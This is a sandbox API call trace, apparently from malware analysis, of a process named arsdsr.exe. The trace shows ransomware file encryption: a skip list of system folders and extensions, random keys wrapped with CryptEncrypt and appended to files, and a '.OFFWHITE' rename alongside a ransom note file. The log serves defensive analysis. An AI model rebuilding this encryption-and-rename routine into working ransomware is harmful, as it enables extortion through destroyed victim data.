(lpString1=".", lpString2=".") returned 0 [0147.240] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe79db030, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xed25d0a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xed25d0a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0147.241] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0147.241] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0147.241] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x896b9210, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x896b9210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe8b8c220, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="Hx.hxn", cAlternateFileName="")) returned 1 [0147.242] lstrcmpiW (lpString1="Hx.hxn", lpString2=".") returned 1 [0147.242] lstrcmpiW (lpString1="Hx.hxn", lpString2="..") returned 1 [0147.242] lstrcmpiW (lpString1="Hx.hxn", lpString2="...") returned 1 [0147.242] lstrcmpiW (lpString1="Hx.hxn", lpString2="windows") returned -1 [0147.242] lstrcmpiW (lpString1="Hx.hxn", lpString2="$recycle.bin") returned 1 [0147.242] lstrcmpiW (lpString1="Hx.hxn", lpString2="rsa") returned -1 [0147.242] lstrcmpiW (lpString1="Hx.hxn", lpString2="ntuser.dat") returned -1 [0147.242] lstrcmpiW (lpString1="Hx.hxn", lpString2="programdata") returned -1 [0147.242] lstrcmpiW (lpString1="Hx.hxn", lpString2="appdata") returned 1 [0147.242] lstrcmpiW (lpString1="Hx.hxn", lpString2="program files") returned -1 [0147.242] lstrcmpiW (lpString1="Hx.hxn", lpString2="program files (x86)") returned -1 [0147.242] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft Help\\" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\") returned="C:/Users\\All Users\\Microsoft Help\\" [0147.242] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\", lpString2="Hx.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\Hx.hxn") returned="C:/Users\\All Users\\Microsoft Help\\Hx.hxn" [0147.242] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.242] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.242] PathFindExtensionW (pszPath="Hx.hxn") returned=".hxn" [0147.242] lstrcmpiW (lpString1=".hxn", lpString2=".exe") returned 1 [0147.242] lstrcmpiW (lpString1=".hxn", lpString2=".log") returned -1 [0147.242] lstrcmpiW (lpString1=".hxn", lpString2=".cab") returned 1 [0147.243] lstrcmpiW (lpString1=".hxn", lpString2=".cmd") returned 1 [0147.243] lstrcmpiW (lpString1=".hxn", lpString2=".com") returned 1 [0147.243] lstrcmpiW (lpString1=".hxn", lpString2=".cpl") returned 1 [0147.243] lstrcmpiW (lpString1=".hxn", lpString2=".ini") returned -1 [0147.243] lstrcmpiW (lpString1=".hxn", lpString2=".dll") returned 1 [0147.243] lstrcmpiW (lpString1=".hxn", lpString2=".url") returned -1 [0147.243] lstrcmpiW (lpString1=".hxn", lpString2=".ttf") returned -1 [0147.243] lstrcmpiW (lpString1=".hxn", lpString2=".mp3") returned -1 [0147.243] lstrcmpiW (lpString1=".hxn", lpString2=".pif") returned -1 [0147.243] lstrcmpiW (lpString1=".hxn", lpString2=".mp4") returned -1 [0147.243] lstrcmpiW (lpString1=".hxn", lpString2=".OFFWHITE") returned -1 [0147.243] lstrcmpiW (lpString1=".hxn", lpString2=".msi") returned -1 [0147.243] lstrcmpiW (lpString1="Hx.hxn", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0147.243] GetProcessHeap () returned 0x500000 [0147.243] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526b78 [0147.243] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft Help\\Hx.hxn" (normalized: "c:\\users\\all users\\microsoft help\\hx.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0147.244] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=390) returned 1 [0147.245] GetProcessHeap () returned 0x500000 [0147.245] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0147.245] GetProcessHeap () returned 0x500000 [0147.245] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0147.245] GetProcessHeap () returned 0x500000 [0147.245] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0147.245] GetProcessHeap () returned 0x500000 [0147.245] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0147.245] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.245] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.245] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0147.245] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.245] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.245] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0147.245] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.245] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.245] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295e310*=0x100) returned 1 [0147.246] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.246] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.246] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295e30c*=0x100) returned 1 [0147.246] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x186, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.246] SetLastError (dwErrCode=0x0) [0147.246] WriteFile (in: hFile=0xb0, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.248] GetLastError () returned 0x0 [0147.248] GetLastError () returned 0x0 [0147.248] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x286, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.248] WriteFile (in: hFile=0xb0, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.248] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x386, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.248] WriteFile (in: hFile=0xb0, lpBuffer=0x526b78*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x526b78*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0147.248] GetProcessHeap () returned 0x500000 [0147.248] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x186) returned 0x52ebe8 [0147.248] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.249] ReadFile (in: hFile=0xb0, lpBuffer=0x52ebe8, nNumberOfBytesToRead=0x186, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x52ebe8*, lpNumberOfBytesRead=0x295e540*=0x186, lpOverlapped=0x0) returned 1 [0147.249] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.249] WriteFile (in: hFile=0xb0, lpBuffer=0x52ebe8*, nNumberOfBytesToWrite=0x186, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x52ebe8*, lpNumberOfBytesWritten=0x295e54c*=0x186, lpOverlapped=0x0) returned 1 [0147.249] GetProcessHeap () returned 0x500000 [0147.249] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x52ebe8 | out: hHeap=0x500000) returned 1 [0147.249] CloseHandle (hObject=0xb0) returned 1 [0147.249] GetProcessHeap () returned 0x500000 [0147.249] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0147.249] GetProcessHeap () returned 0x500000 [0147.249] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0147.249] GetProcessHeap () returned 0x500000 [0147.249] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0147.249] GetProcessHeap () returned 0x500000 [0147.249] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0147.249] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\All Users\\Microsoft Help\\Hx.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\Hx.hxn") returned="C:/Users\\All Users\\Microsoft Help\\Hx.hxn" [0147.249] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\Hx.hxn", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\Hx.hxn.OFFWHITE") returned="C:/Users\\All Users\\Microsoft Help\\Hx.hxn.OFFWHITE" [0147.249] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft Help\\Hx.hxn" (normalized: "c:\\users\\all users\\microsoft help\\hx.hxn"), lpNewFileName="C:/Users\\All Users\\Microsoft Help\\Hx.hxn.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft help\\hx.hxn.offwhite")) returned 1 [0147.250] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xfa72fc10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa72fc10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa7a2030, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="MS.EXCEL.14.1033.hxn", cAlternateFileName="MSEXCE~1.HXN")) returned 1 [0147.250] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn", lpString2=".") returned 1 [0147.250] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn", lpString2="..") returned 1 [0147.250] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn", lpString2="...") returned 1 [0147.250] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn", lpString2="windows") returned -1 [0147.250] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn", lpString2="$recycle.bin") returned 1 [0147.250] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn", lpString2="rsa") returned -1 [0147.250] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0147.251] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn", lpString2="programdata") returned -1 [0147.251] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn", lpString2="appdata") returned 1 [0147.251] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn", lpString2="program files") returned -1 [0147.251] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn", lpString2="program files (x86)") returned -1 [0147.251] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft Help\\" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\") returned="C:/Users\\All Users\\Microsoft Help\\" [0147.251] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\", lpString2="MS.EXCEL.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn" [0147.251] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.251] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.251] PathFindExtensionW (pszPath="MS.EXCEL.14.1033.hxn") returned=".hxn" [0147.251] lstrcmpiW (lpString1=".hxn", lpString2=".exe") returned 1 [0147.251] lstrcmpiW (lpString1=".hxn", lpString2=".log") returned -1 [0147.251] lstrcmpiW (lpString1=".hxn", lpString2=".cab") returned 1 [0147.251] lstrcmpiW (lpString1=".hxn", lpString2=".cmd") returned 1 [0147.251] lstrcmpiW (lpString1=".hxn", lpString2=".com") returned 1 [0147.251] lstrcmpiW (lpString1=".hxn", lpString2=".cpl") returned 1 [0147.251] lstrcmpiW (lpString1=".hxn", lpString2=".ini") returned -1 [0147.251] lstrcmpiW (lpString1=".hxn", lpString2=".dll") returned 1 [0147.251] lstrcmpiW (lpString1=".hxn", lpString2=".url") returned -1 [0147.251] lstrcmpiW (lpString1=".hxn", lpString2=".ttf") returned -1 [0147.251] lstrcmpiW (lpString1=".hxn", lpString2=".mp3") returned -1 [0147.251] lstrcmpiW (lpString1=".hxn", lpString2=".pif") returned -1 [0147.251] lstrcmpiW (lpString1=".hxn", lpString2=".mp4") returned -1 [0147.251] lstrcmpiW (lpString1=".hxn", lpString2=".OFFWHITE") returned -1 [0147.251] lstrcmpiW (lpString1=".hxn", lpString2=".msi") returned -1 [0147.251] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0147.251] GetProcessHeap () returned 0x500000 [0147.252] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526b88 [0147.252] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.excel.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0147.311] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=326) returned 1 [0147.311] GetProcessHeap () returned 0x500000 [0147.311] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0147.311] GetProcessHeap () returned 0x500000 [0147.311] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0147.311] GetProcessHeap () returned 0x500000 [0147.311] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0147.311] GetProcessHeap () returned 0x500000 [0147.311] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0147.311] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.311] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.311] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0147.311] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.311] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.311] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0147.311] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.311] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.311] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295e310*=0x100) returned 1 [0147.312] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.312] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.312] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295e30c*=0x100) returned 1 [0147.312] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x146, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.312] SetLastError (dwErrCode=0x0) [0147.312] WriteFile (in: hFile=0xb0, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.314] GetLastError () returned 0x0 [0147.314] GetLastError () returned 0x0 [0147.314] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x246, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.314] WriteFile (in: hFile=0xb0, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0147.314] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x346, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.314] WriteFile (in: hFile=0xb0, lpBuffer=0x526b88*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x526b88*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0147.314] GetProcessHeap () returned 0x500000 [0147.314] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x146) returned 0x51d650 [0147.314] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.315] ReadFile (in: hFile=0xb0, lpBuffer=0x51d650, nNumberOfBytesToRead=0x146, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x51d650*, lpNumberOfBytesRead=0x295e540*=0x146, lpOverlapped=0x0) returned 1 [0147.315] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.315] WriteFile (in: hFile=0xb0, lpBuffer=0x51d650*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x51d650*, lpNumberOfBytesWritten=0x295e54c*=0x146, lpOverlapped=0x0) returned 1 [0147.315] GetProcessHeap () returned 0x500000 [0147.315] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x51d650 | out: hHeap=0x500000) returned 1 [0147.315] CloseHandle (hObject=0xb0) returned 1 [0147.315] GetProcessHeap () returned 0x500000 [0147.315] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0147.315] GetProcessHeap () returned 0x500000 [0147.315] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0147.315] GetProcessHeap () returned 0x500000 [0147.315] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0147.315] GetProcessHeap () returned 0x500000 [0147.315] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0147.315] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn" [0147.315] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn.OFFWHITE") returned="C:/Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn.OFFWHITE" [0147.315] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.excel.14.1033.hxn"), lpNewFileName="C:/Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft help\\ms.excel.14.1033.hxn.offwhite")) returned 1 [0147.316] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xfa755d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa755d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa7a2030, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x15e, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="MS.EXCEL.DEV.14.1033.hxn", cAlternateFileName="MSEXCE~2.HXN")) returned 1 [0147.316] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn", lpString2=".") returned 1 [0147.316] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn", lpString2="..") returned 1 [0147.316] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn", lpString2="...") returned 1 [0147.316] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn", lpString2="windows") returned -1 [0147.316] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn", lpString2="$recycle.bin") returned 1 [0147.316] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn", lpString2="rsa") returned -1 [0147.317] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0147.317] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn", lpString2="programdata") returned -1 [0147.317] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn", lpString2="appdata") returned 1 [0147.317] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn", lpString2="program files") returned -1 [0147.317] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn", lpString2="program files (x86)") returned -1 [0147.317] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft Help\\" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\") returned="C:/Users\\All Users\\Microsoft Help\\" [0147.317] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft Help\\", lpString2="MS.EXCEL.DEV.14.1033.hxn" | out: lpString1="C:/Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn") returned="C:/Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn" [0147.317] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.317] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.317] PathFindExtensionW (pszPath="MS.EXCEL.DEV.14.1033.hxn") returned=".hxn" [0147.317] lstrcmpiW (lpString1=".hxn", lpString2=".exe") returned 1 [0147.317] lstrcmpiW (lpString1=".hxn", lpString2=".log") returned -1 [0147.317] lstrcmpiW (lpString1=".hxn", lpString2=".cab") returned 1 [0147.317] lstrcmpiW (lpString1=".hxn", lpString2=".cmd") returned 1 [0147.317] lstrcmpiW (lpString1=".hxn", lpString2=".com") returned 1 [0147.317] lstrcmpiW (lpString1=".hxn", lpString2=".cpl") returned 1 [0147.317] lstrcmpiW (lpString1=".hxn", lpString2=".ini") returned -1 [0147.317] lstrcmpiW (lpString1=".hxn", lpString2=".dll") returned 1 [0147.317] lstrcmpiW (lpString1=".hxn", lpString2=".url") returned -1 [0147.317] lstrcmpiW (lpString1=".hxn", lpString2=".ttf") returned -1 [0147.317] lstrcmpiW (lpString1=".hxn", lpString2=".mp3") returned -1 [0147.317] lstrcmpiW (lpString1=".hxn", lpString2=".pif") returned -1 [0147.317] lstrcmpiW (lpString1=".hxn", lpString2=".mp4") returned -1 [0147.317] lstrcmpiW (lpString1=".hxn", lpString2=".OFFWHITE") returned -1 [0147.317] lstrcmpiW (lpString1=".hxn", lpString2=".msi") returned -1 [0147.317] lstrcmpiW (lpString1="MS.EXCEL.DEV.14.1033.hxn", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0147.318] GetProcessHeap () returned 0x500000 [0147.318] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526b98 [0147.318] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.excel.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0147.318] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=350) returned 1 [0147.318] GetProcessHeap () returned 0x500000 [0147.318] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0147.318] GetProcessHeap () returned 0x500000 [0147.318] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0147.318] GetProcessHeap () returned 0x500000 [0147.318] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0147.319] GetProcessHeap () returned 0x500000 [0147.319] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0147.319] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.319] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.319] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0147.319] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.319] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.319] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0147.319] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.319] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.319] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295e310*=0x100) returned 1 [0147.319] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.319] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.319] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: 